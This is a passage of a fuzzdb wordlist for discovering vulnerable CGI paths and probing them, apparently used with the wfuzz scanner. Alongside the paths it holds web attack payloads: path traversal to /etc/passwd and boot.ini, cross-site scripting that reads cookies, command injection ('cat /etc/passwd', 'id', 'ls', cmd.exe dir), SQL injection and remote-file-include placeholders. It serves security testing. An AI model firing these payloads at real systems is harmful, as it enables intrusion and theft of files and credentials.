/wordlist/fuzzdb/Discovery/PredictableRes/CGI_XPlatform.fuzz.txt

http://wfuzz.googlecode.com/ · Plain Text · 3948 lines · 3948 code · 0 blank · 0 comment · 0 complexity · 798e9ede0fc7d946a97adde084bdf26f MD5 · raw file

Large files are truncated click here to view the full file

  1. # fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
  2. 14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
  3. 14all.cgi?cfg=../../../../../../../../etc/passwd
  4. 666%0a%0a<script>alert('Vulnerable');</script>666.jsp
  5. 852566C90012664F
  6. </etc/passwd>
  7. <script>alert('Vulnerable')</script>
  8. <script>alert('Vulnerable')</script>.aspx
  9. <script>alert('Vulnerable')</script>.jsp
  10. <script>alert('Vulnerable')</script>.shtm
  11. <script>alert('Vulnerable')</script>.shtml
  12. <script>alert('Vulnerable')</script>.stm
  13. <script>alert('Vulnerable')</script>.thtml
  14. ?D=A
  15. ?M=A
  16. ?N=D
  17. ?Open
  18. ?OpenServer
  19. ?PageServices
  20. ?S=A
  21. ?\"><script>alert('Vulnerable');</script>
  22. ?mod=<script>alert(document.cookie)</script>&op=browse
  23. ?mod=node&nid=some_thing&op=view
  24. ?mod=some_thing&op=browse
  25. ?pattern=/etc/*&sort=name
  26. ?sql_debug=1
  27. ?wp-cs-dump
  28. ADMINconfig.php
  29. ASP/cart/database/metacart.mdb
  30. AT-admin.cgi
  31. AT-generate.cgi
  32. Admin/
  33. Admin_files/
  34. Admin_files/order.log
  35. Administration/
  36. Agent/
  37. Agentes/
  38. Agents/
  39. Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
  40. AnyBoard.cgi
  41. AnyForm
  42. AnyForm2
  43. Asp/
  44. BACLIENT
  45. Backup/add-passwd.cgi
  46. C
  47. CFIDE/administrator/index.cfm
  48. CFIDE/probe.cfm
  49. COM
  50. CSMailto.cgi
  51. CSMailto/CSMailto.cgi
  52. CSNews.cgi
  53. CVS/Entries
  54. Cgitest.exe
  55. Citrix/ICAWEB/
  56. Citrix/MetaFrameXP/default/login.asp
  57. Citrix/PNAgent/
  58. Config1.htm
  59. Count.cgi
  60. DB4Web/10.10.10.10:100
  61. DC
  62. DCFORM
  63. DCFORMS98.CGI
  64. DCShop/auth_data/auth_user_file.txt
  65. DCShop/orders/orders.txt
  66. DEASAppDesign.nsf
  67. DEASLog.nsf
  68. DEASLog01.nsf
  69. DEASLog02.nsf
  70. DEASLog03.nsf
  71. DEASLog04.nsf
  72. DEASLog05.nsf
  73. DEESAdmin.nsf
  74. DMR/
  75. Data/settings.xml+
  76. DomainFiles/*//../../../../../../../../../../etc/passwd
  77. EXE/
  78. Excel/
  79. File
  80. FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
  81. FileSeek.cgi?head=&foot=;cat%20/etc/passwd
  82. FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
  83. FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
  84. FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
  85. FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
  86. FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
  87. FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
  88. FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
  89. FormMail.cgi?<script>alert(\
  90. FormMail.pl
  91. GW5/GWWEB.EXE
  92. GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
  93. GW5/GWWEB.EXE?HELP=bad-request
  94. GWWEB.EXE?HELP=bad-request
  95. Gozila.cgi
  96. HyperStat/stat_what.log
  97. IBMWebAS/
  98. IBMWebAS/apidocs/
  99. IBMWebAS/configDocs/
  100. IBMWebAS/docs/
  101. IBMWebAS/mbeanDocs/
  102. IDSWebApp/IDSjsp/Login.jsp
  103. ISSamples/SQLQHit.asp
  104. ISSamples/sqlqhit.asp
  105. IlohaMail/blank.html
  106. ImageFolio/admin/admin.cgi
  107. JUNK(10)
  108. JUNK(10)abcd.html
  109. JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
  110. JUNK(223)<font%20size=50>DEFACED<!--//--
  111. JUNK(5).csp
  112. JUNK(5).htw
  113. JUNK(5).xml
  114. JUNK(5)/
  115. JUNK(6).cfm?mode=debug
  116. LOGIN.PWD
  117. LWGate
  118. LWGate.cgi
  119. LiveHelp/
  120. MIDICART/midicart.mdb
  121. MSword/
  122. MWS/HandleSearch.html?searchTarget=test&B1=Submit
  123. Mem/dynaform/FileExplorer.htm
  124. Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
  125. MsmMask.exe
  126. MsmMask.exe?mask=/junk334
  127. Msword/
  128. NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
  129. NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
  130. NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
  131. NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
  132. NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
  133. NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
  134. NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
  135. NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
  136. NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
  137. NULL.printer
  138. NetDetector/middle_help_intro.htm
  139. NetDynamic/
  140. NetDynamics/
  141. OA_HTML/
  142. OA_HTML/META-INF/
  143. OA_HTML/PTB/ECXOTAPing.htm
  144. OA_HTML/PTB/ICXINDEXBASECASE.htm
  145. OA_HTML/PTB/mwa_readme.htm
  146. OA_HTML/PTB/xml_sample1.htm
  147. OA_HTML/_pages/
  148. OA_HTML/jsp/
  149. OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
  150. OA_HTML/jsp/fnd/fndhelputil.jsp
  151. OA_HTML/jsp/fnd/fndversion.jsp
  152. OA_HTML/jsp/por/services/login.jsp
  153. OA_HTML/jsp/wf/WFReassign.jsp
  154. OA_HTML/oam/
  155. OA_HTML/oam/weboam.log
  156. OA_HTML/webtools/doc/index.html
  157. OA_JAVA/
  158. OA_JAVA/Oracle/
  159. OA_JAVA/oracle/forms/registry/Registry.dat
  160. OA_JAVA/servlet.zip
  161. OA_MEDIA/
  162. OpenFile.aspx?file=../../../../../../../../../../boot.ini
  163. OpenTopic
  164. Orders/order_log.dat
  165. Orders/order_log_v12.dat
  166. PDG_Cart/
  167. PDG_Cart/oder.log
  168. PDG_Cart/shopper.conf
  169. PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
  170. PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
  171. POSTNUKEMy_eGallery/public/displayCategory.php
  172. PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
  173. PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
  174. Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
  175. Pages/
  176. Pbcgi.exe
  177. ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found
  178. Program%20Files/
  179. README
  180. README.TXT
  181. ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
  182. SGB_DIR/superguestconfig
  183. SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
  184. SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
  185. SQLQHit.asp
  186. SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
  187. SUNWmc/htdocs/
  188. SUNWmc/htdocs/en_US/
  189. Search
  190. SetSecurity.shm
  191. SilverStream
  192. SilverStream/Meta/Tables/?access-mode=text
  193. Site/biztalkhttpreceive.dll
  194. SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
  195. SiteScope/htdocs/SiteScope.html
  196. SiteServer/Admin/commerce/foundation/DSN.asp
  197. SiteServer/Admin/commerce/foundation/domain.asp
  198. SiteServer/Admin/commerce/foundation/driver.asp
  199. SiteServer/Admin/knowledge/dsmgr/default.asp
  200. SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
  201. SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
  202. SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
  203. SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
  204. SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
  205. SiteServer/Admin/knowledge/persmbr/vs.asp
  206. SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
  207. SiteServer/Publishing/ViewCode.asp
  208. SiteServer/admin/
  209. SiteServer/admin/findvserver.asp
  210. Sites/Knowledge/Membership/Inspired/ViewCode.asp
  211. Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
  212. Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
  213. Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
  214. Sites/Samples/Knowledge/Push/ViewCode.asp
  215. Sites/Samples/Knowledge/Search/ViewCode.asp
  216. Sources/
  217. Statistics/
  218. Stats/
  219. StoreDB/
  220. Survey/Survey.Htm
  221. TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
  222. USER/CONFIG.AP
  223. Upload.pl
  224. VBZooM/add-subject.php
  225. Vs
  226. VsSetCookie.exe?
  227. W
  228. WEB-INF./web.xml
  229. WEB-INF/web.xml
  230. WEBAGENT/CQMGSERV/CF-SINFO.TPF
  231. WINDMAIL.EXE?%20-n%20c:\boot.ini%
  232. WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
  233. WS_FTP.LOG
  234. WS_FTP.ini
  235. WebAdmin.dll?View=Logon
  236. WebCacheDemo.html
  237. WebShop/
  238. WebShop/logs/cc.txt
  239. WebShop/templates/cc.txt
  240. WebSphereSamples
  241. WebTrend/
  242. Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
  243. Web_store/
  244. Webnews.exe
  245. XMBforum/buddy.php
  246. XMBforum/member.php
  247. XSQLConfig.xml
  248. Xcelerate/LoginPage.html
  249. YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc
  250. YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
  251. YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
  252. YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
  253. [SecCheck]/..%252f..%252f../ext.ini
  254. [SecCheck]/..%255c..%255c../ext.ini
  255. [SecCheck]/..%2f../ext.ini
  256. \"><img%20src=\"javascript:alert(document.domain)\">
  257. _cti_pvt/
  258. _head.php
  259. _layouts/alllibs.htm
  260. _layouts/settings.htm
  261. _layouts/userinfo.htm
  262. _mem_bin/
  263. _mem_bin/FormsLogin.asp
  264. _mem_bin/auoconfig.asp
  265. _mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
  266. _mem_bin/remind.asp
  267. _pages
  268. _pages/_demo/
  269. _pages/_demo/_sql/
  270. _pages/_webapp/_admin/_showjavartdetails.java
  271. _pages/_webapp/_admin/_showpooldetails.java
  272. _pages/_webapp/_jsp/
  273. _private/
  274. _private/_vti_cnf/
  275. _private/form_results.htm
  276. _private/form_results.html
  277. _private/form_results.txt
  278. _private/orders.htm
  279. _private/orders.txt
  280. _private/register.htm
  281. _private/register.txt
  282. _private/registrations.htm
  283. _private/registrations.txt
  284. _vti_bin/
  285. _vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
  286. _vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
  287. _vti_bin/CGImail.exe
  288. _vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
  289. _vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
  290. _vti_bin/_vti_aut/dvwssr.dll
  291. _vti_bin/_vti_aut/fp30reg.dll
  292. _vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  293. _vti_bin/_vti_cnf/
  294. _vti_bin/admin.pl
  295. _vti_bin/cfgwiz.exe
  296. _vti_bin/contents.htm
  297. _vti_bin/fpadmin.htm
  298. _vti_bin/fpcount.exe
  299. _vti_bin/fpcount.exe/
  300. _vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
  301. _vti_bin/fpremadm.exe
  302. _vti_bin/fpsrvadm.exe
  303. _vti_bin/shtml.dll/_vti_rpc
  304. _vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
  305. _vti_bin/shtml.exe/_vti_rpc
  306. _vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
  307. _vti_bin/shtml.exe/junk_nonexistant.exe
  308. _vti_cnf/_vti_cnf/
  309. _vti_inf.html
  310. _vti_log/_vti_cnf/
  311. _vti_pvt/access.cnf
  312. _vti_pvt/administrators.pwd
  313. _vti_pvt/authors.pwd
  314. _vti_pvt/botinfs.cnf
  315. _vti_pvt/bots.cnf
  316. _vti_pvt/deptodoc.btr
  317. _vti_pvt/doctodep.btr
  318. _vti_pvt/linkinfo.cnf
  319. _vti_pvt/service.cnf
  320. _vti_pvt/service.pwd
  321. _vti_pvt/services.cnf
  322. _vti_pvt/services.org
  323. _vti_pvt/svacl.cnf
  324. _vti_pvt/users.pwd
  325. _vti_pvt/writeto.cnf
  326. _vti_txt/
  327. _vti_txt/_vti_cnf/
  328. a%5c.aspx
  329. a.jsp/<script>alert('Vulnerable')</script>
  330. a/
  331. a1disp3.cgi?../../../../../../../../../../etc
  332. a1disp3.cgi?../../../../../../../../../../etc/passwd
  333. a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
  334. a1stats/a1disp3.cgi?../../../../../../../../../../passwd
  335. a1stats/a1disp3.cgi?../../../../../../../etc/passwd
  336. a1stats/a1disp4.cgi?../../../../../../../etc/passwd
  337. a?<script>alert('Vulnerable')</script>
  338. a_domlog.nsf
  339. a_security.htm
  340. ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
  341. ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
  342. ab2/\@AdminViewError
  343. abonnement.asp
  344. acart2_0/acart2_0.mdb
  345. acart2_0/admin/category.asp
  346. acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
  347. acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
  348. acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
  349. acart2_0/error.asp?msg=<script>alert(\"test\")</script>
  350. acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
  351. acartpath/signin.asp?|-|0|404_Object_Not_Found
  352. acceso/
  353. access-log
  354. access.log
  355. access/
  356. access_log
  357. acciones/
  358. account.nsf
  359. account/
  360. accounting/
  361. accounts.nsf
  362. accounts/getuserdesc.asp
  363. achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
  364. active.log
  365. activex/
  366. add.php
  367. add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
  368. add_acl
  369. add_ftp.cgi
  370. add_user.php
  371. addbanner.cgi
  372. addressbook.php?\"><script>alert(Vulnerable)</script><!--
  373. addressbook/index.php?name=<script>alert('Vulnerable')</script>
  374. addressbook/index.php?surname=<script>alert('Vulnerable')</script>
  375. adduser.cgi
  376. addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
  377. adm/
  378. admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
  379. admcgi/contents.htm
  380. admcgi/scripts/Fpadmcgi.exe
  381. admentor/adminadmin.asp
  382. admin-serv/config/admpw
  383. admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
  384. admin.cgi
  385. admin.cgi?list=../../../../../../../../../../etc
  386. admin.cgi?list=../../../../../../../../../../etc/passwd
  387. admin.htm
  388. admin.html
  389. admin.nsf
  390. admin.php
  391. admin.php3
  392. admin.php4?reg_login=1
  393. admin.php?en_log_id=0&action=config
  394. admin.php?en_log_id=0&action=users
  395. admin.pl
  396. admin.shtml
  397. admin/
  398. admin/admin.php?adminpy=1
  399. admin/admin.shtml
  400. admin/admin_phpinfo.php4
  401. admin/adminproc.asp
  402. admin/aindex.htm
  403. admin/auth.php
  404. admin/browse.asp?FilePath=c:\&Opt=2&level=0
  405. admin/cfg/configscreen.inc.php+
  406. admin/cfg/configsite.inc.php+
  407. admin/cfg/configsql.inc.php+
  408. admin/cfg/configtache.inc.php+
  409. admin/cms/htmltags.php
  410. admin/contextAdmin/contextAdmin.html
  411. admin/cplogfile.log
  412. admin/credit_card_info.php
  413. admin/database/wwForum.mdb
  414. admin/datasource.asp
  415. admin/db.php
  416. admin/db.php?dump_sql=1
  417. admin/exec.php3
  418. admin/exec.php3?cmd=cat%20/etc/passwd
  419. admin/exec.php3?cmd=dir%20c:\
  420. admin/index.php
  421. admin/login.php?action=insert&username=test&password=test
  422. admin/login.php?path=\"></form><form
  423. admin/modules/cache.php+
  424. admin/objects.inc.php4
  425. admin/phpinfo.php
  426. admin/script.php
  427. admin/settings.inc.php+
  428. admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
  429. admin/system.php3?cmd=cat%20/etc/passwd
  430. admin/system.php3?cmd=dir%20c:\
  431. admin/system_footer.php
  432. admin/templates/header.php
  433. admin/upload.php
  434. admin/wg_user-info.ml
  435. admin4.nsf
  436. admin5.nsf
  437. admin_t/include/aff_liste_langue.php
  438. adminhot.cgi
  439. administration/
  440. administrator/
  441. administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
  442. administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
  443. administrator/gallery/uploadimage.php
  444. administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
  445. administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
  446. administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
  447. administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
  448. adminwww.cgi
  449. admisapi/fpadmin.htm
  450. adovbs.inc
  451. adsamples/config/site.csc
  452. adv/gm001-mc/
  453. advwebadmin/
  454. advworks/equipment/catalog_type.asp
  455. af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
  456. aff_news.php
  457. affich.php?image=<script>alert(document.cookie)</script>
  458. agentadmin.php
  459. agentes/
  460. agentrunner.nsf
  461. aglimpse
  462. aglimpse.cgi
  463. akopia/
  464. aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
  465. albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
  466. alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
  467. alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
  468. alog.nsf
  469. amadmin.pl
  470. ammerum/
  471. anacondaclip.pl?template=../../../../../../../../../../etc
  472. anacondaclip.pl?template=../../../../../../../../../../etc/passwd
  473. analog/
  474. ans.pl?p=../../../../../usr/bin/id|&blah
  475. ans/ans.pl?p=../../../../../usr/bin/id|&blah
  476. anthill/login.php
  477. antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
  478. antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
  479. anyboard.cgi
  480. apache/
  481. apex/
  482. apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
  483. aplogon.html
  484. app/
  485. appdet.html
  486. applicattion/
  487. applicattions/
  488. applist.asp
  489. approval/ts_app.htm
  490. apps/
  491. apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
  492. apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
  493. archie
  494. architext_query.cgi
  495. architext_query.pl
  496. archivar/
  497. archive.asp
  498. archive/
  499. archive/a_domlog.nsf
  500. archive/l_domlog.nsf
  501. archive_forum.asp
  502. archives/
  503. archivo/
  504. ariadne/
  505. article.cfm?id=1'<script>alert(document.cookie);</script>
  506. article.php?article=4965&post=1111111111
  507. article.php?sid=\"><Img
  508. ash
  509. ashnews.php
  510. asp/
  511. asp/SQLQHit.asp
  512. asp/sqlqhit.asp
  513. astrocam.cgi
  514. atc/
  515. athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
  516. athenareg.php?pass=%20;cat%20/etc/passwd
  517. atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
  518. atomicboard/index.php?location=../../../../../../../../../../etc/passwd
  519. auction/auction.cgi?action=
  520. auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
  521. auctiondeluxe/auction.pl
  522. auktion.cgi?menue=../../../../../../../../../../etc
  523. auktion.cgi?menue=../../../../../../../../../../etc/passwd
  524. auth.inc.php
  525. auth/
  526. auth_data/auth_user_file.txt
  527. author.asp
  528. autohtml.php?op=modload&mainfile=x&name=/etc/passwd
  529. autologon.html?10514
  530. awebvisit.stat
  531. awl/auctionweaver.pl
  532. awstats.pl
  533. awstats/awstats.pl
  534. ax-admin.cgi
  535. ax.cgi
  536. axis-cgi/buffer/command.cgi
  537. axs.cgi
  538. ayuda/
  539. b2-include/b2edit.showposts.php
  540. b2-tools/gm-2-b2.php
  541. ba4.nsf
  542. backdoor/
  543. backup/
  544. badmin.cgi
  545. bak/
  546. ban.bak
  547. ban.dat
  548. ban.log
  549. banca/
  550. banco/
  551. bandwidth/index.cgi
  552. bank/
  553. banmat.pwd
  554. banner.cgi
  555. bannereditor.cgi
  556. banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
  557. base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
  558. bash
  559. basilix.php3
  560. basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
  561. basilix/
  562. basilix/compose-attach.php3
  563. basilix/mbox-list.php3
  564. basilix/message-read.php3
  565. bb-ack.sh
  566. bb-dnbd/faxsurvey
  567. bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
  568. bb-hist?HI
  569. bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
  570. bb-histlog.sh
  571. bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
  572. bb-rep.sh
  573. bb-replog.sh
  574. bb000001.pl<script>alert('Vulnerable')</script>
  575. bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
  576. bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
  577. bbs_forum.cgi
  578. bbv/
  579. bc4j.html
  580. bdata/
  581. bdatos/
  582. beta/
  583. betsie/parserl.pl/<script>alert('Vulnerable')</script>;
  584. betsie/parserl.pl/<script>alert('XSS')</script>;
  585. bigconf.cgi
  586. bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
  587. bigsam_guestbook.php?displayBegin=9999...9999
  588. billing.nsf
  589. billing/billing.apw
  590. bin/
  591. bin/CGImail.exe
  592. bin/admin.pl
  593. bin/cfgwiz.exe
  594. bin/common/user_update_passwd.pl
  595. bin/contents.htm
  596. bin/fpadmin.htm
  597. bin/fpremadm.exe
  598. bin/fpsrvadm.exe
  599. bizdb1-search.cgi
  600. biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
  601. biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
  602. blah-whatever-badfile.jsp
  603. blah-whatever.jsp
  604. blah123.php
  605. blah_badfile.shtml
  606. blahb.ida
  607. blahb.idq
  608. blog/
  609. blog/mt-check.cgi
  610. blog/mt-load.cgi
  611. blog/mt.cfg
  612. bmp/
  613. bmp/JSPClient.java
  614. bmp/README.txt
  615. bmp/global-web-application.xml
  616. bmp/mime.types
  617. bmp/setconn.jsp
  618. bmp/sqljdemo.jsp
  619. bnbform
  620. bnbform.cgi
  621. board/index.php
  622. board/philboard_admin.asp+
  623. boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
  624. boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
  625. book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  626. bookmark.nsf
  627. books.nsf
  628. boot/
  629. boozt/admin/index.cgi?section=5&input=1
  630. bottom.html
  631. bsguest.cgi?email=x;ls
  632. bslist.cgi?email=x;ls
  633. buddies.blt
  634. buddy.blt
  635. buddylist.blt
  636. bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
  637. bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
  638. bugtest+/+
  639. build.cgi
  640. bulk/bulk.cgi
  641. busytime.nsf
  642. buy/
  643. buynow/
  644. bytehoard/index.php?infolder=../../../../../../../../../../../etc/
  645. c/
  646. c/winnt/system32/cmd.exe?/c+dir+/OG
  647. c32web.exe/ChangeAdminPassword
  648. c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
  649. c_download.cgi
  650. ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
  651. ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
  652. ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
  653. ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
  654. ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
  655. cache-stats/
  656. cached_feed.cgi
  657. cachemgr.cgi
  658. caja/
  659. cal_make.pl?p0=../../../../../../../../../../etc
  660. cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
  661. calendar
  662. calendar.nsf
  663. calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
  664. calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
  665. calendar.pl
  666. calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
  667. calendar/index.cgi
  668. calendar_admin.pl?config=|cat%20/etc/passwd|
  669. calender_admin.pl
  670. campas?%0acat%0a/etc/passwd%0a
  671. carbo.dll
  672. card/
  673. cards/
  674. cart.pl
  675. cart.pl?db='
  676. cart/
  677. cart32.exe
  678. cartcart.cgi
  679. cartmanager.cgi
  680. cash/
  681. catalog.nsf
  682. catalog/includes/include_once.php
  683. categorie.php3?cid=june
  684. catinfo
  685. catinfo?<u><b>TESTING
